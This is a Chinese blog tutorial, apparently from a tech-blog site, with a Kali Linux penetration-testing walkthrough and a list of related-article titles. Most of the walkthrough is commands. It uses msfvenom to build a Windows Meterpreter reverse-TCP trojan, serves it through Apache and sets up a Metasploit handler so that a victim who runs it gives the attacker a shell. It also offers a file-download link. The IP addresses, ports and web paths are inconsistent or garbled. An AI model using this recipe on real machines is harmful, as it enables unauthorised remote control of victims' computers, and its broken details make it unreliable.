kali渗透测试实战操作
Kali渗透测试复现
- 所需环境
所需环境
Vmware
Kali Linux(IP:192.168.145.128)
Windows 7 or Windows 10
打开终端,输入msfconsole
然后生成一个木马代码如下
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.127.128 LPORT=4444 -f exe > 1.exe
然后打开一个新的终端输入
service apache2 start
rm ar/wwwml/*
cp 1.exe ar/wwwml/
开启Apache服务
再回到MetaSploit,输入
use exploit/multi/handler
设置PAYLOAD
我们这就用TCP连接,所以用这个PAYLOAD
set payload windows/meterpreter/reverse_tcp
再设置下ip和端口
set LHOST 192.168.145.128
set LPORT 5555
然后全部设置完了直接exploit运行,再在靶机上下载木马打开就可以进入系统了
进入系统看看
输入shell
具体教程复现需要的文件下载地址:
链接:https://pan.baidu.com/s/1BBbPo5YPpiWe2y47OyA-tA
提取码:zr2w
kali渗透测试实战操作相关推荐
- Kali渗透测试-远程控制:6200端口变成“后门”
Kali渗透测试-远程控制:6200端口变成"后门" 测试环境 攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机:M ...
- Kali渗透测试:使用Armitage针对漏洞进行攻击
Kali渗透测试:使用Armitage针对漏洞进行攻击 以ms17_010_eternable模块为例("永恒之蓝")经典的漏洞,单击这个模块以后就可以开始攻击了. 实 验 环 境 ...
- Kali渗透测试:使用browser_autopwn2模块进行渗透攻击
Kali渗透测试:使用browser_autopwn2模块进行渗透攻击 如果觉得一个一个地选择模块很麻烦, 也可以使用browser_autopwn模块.这种攻击的思路是渗透者构造一个攻击用的Web服 ...
- kali渗透测试系列---信息收集
kali 渗透测试系列 文章目录 kali 渗透测试系列 信息收集 信息收集 信息收集阶段可以说是在整个渗透测试或者攻击很重要的阶段,毕竟知己知彼才能百战百胜,否则从目标主机使用的平台到数据库的使用再 ...
- Kali渗透测试:网络数据的嗅探与欺骗
Kali渗透测试:网络数据的嗅探与欺骗 无论什么样的漏洞渗透模块,在网络中都是以数据包的形式传输的,因此如果我们能够对网络中的数据包进行分析,就可以掌握渗透的原理. 另外,很多网络攻击的方法也都是发送 ...
- 学习Kali渗透测试笔记
Kali渗透测试 一.什么是渗透测试 1. 软件测试 2. 安全测试与渗透测试 3.渗透测试 二.渗透测试的目标 1. 网络硬件设备 2. 主机操作系统 3. 应用系统 4. 数据库系统 三.渗透测试 ...
- Kali渗透测试:身份认证攻击
Kali渗透测试:身份认证攻击 1.1 简单网络服务认证的攻击 网络上很多常见的应用都采用了密码认证的方式,如SSH.Telnet.FTP等.这些应用被广泛应用在各种网络设备上,如果这些认证模式出现问 ...
- kali渗透测试环境搭建
推荐阅读 kali渗透测试环境搭建 https://m.weishi100.com/mweb/series/?id=1373351 https://m.weishi100.com/mweb/seri ...
- Kali渗透测试:远程控制被控端免杀及DLL生成、注入反弹
Kali渗透测试:远程控制被控端免杀及DLL生成.注入反弹 长期以来,杀毒软件厂商和黑客一直处于博弈的状态,杀毒软件厂商研究了各种检测和清除远程控制被控端的方法,而黑客也在一直致力于研究避开检测的 ...
最新文章
- NLP实践:对话系统技术原理和应用
- ICLR2020 NLP优秀论文分享(附源码)
- Spring MVC-09循序渐进之文件上传(基于Servlet3.0+内置功能)
- springboot接收浏览器发送delete请求( method not allowed 405解决方法)
- python内存管理_Python内存管理(一):预备知识
- 【操作系统】部分概念解释题
- 转转Q1手机行情:iPhone13开始“飘香” 二手5G手机市场苹果占一半
- CSS 元素超出部分滚动, 并隐藏滚动条
- 请问,非计算机专业,只为软考中级,哪一种最容易过?
- 黑马Redis学习——实战篇(4)
- Arrays.copyOf()方法用法
- Web服务器的配置与应用
- 真正想做的人,什么都不说
- 设计模式----工厂
- 1000以内完数Java程序
- 引流获客哪个渠道比较好?
- windows2008 iis7环境SSL部署https多站点
- 线上内存溢出原因排除
- 深入Go语言网络库的基础实现
- ffmpeg 视频转码软件
热门文章
- vue项目中vue-scroller实现上拉加载和下拉刷新
- 关于C语言中的换行问题
- VMware软件安装(超详细)
- DISN:Deep Implicit Surface Network for High-quality Single-view 3D Reconstruction
- 一个程序员的电脑系统文件夹组织规则
- 中正平和的机器人学笔记——7. 一种气驱型柔性臂的逆运动学模型
- fgetc/fputc 和 fgets/fputs 的详细用法
- 学好python能干嘛-学Python后到底能干什么
- 【spark】Spark原理
- linux大于2T硬盘分区方法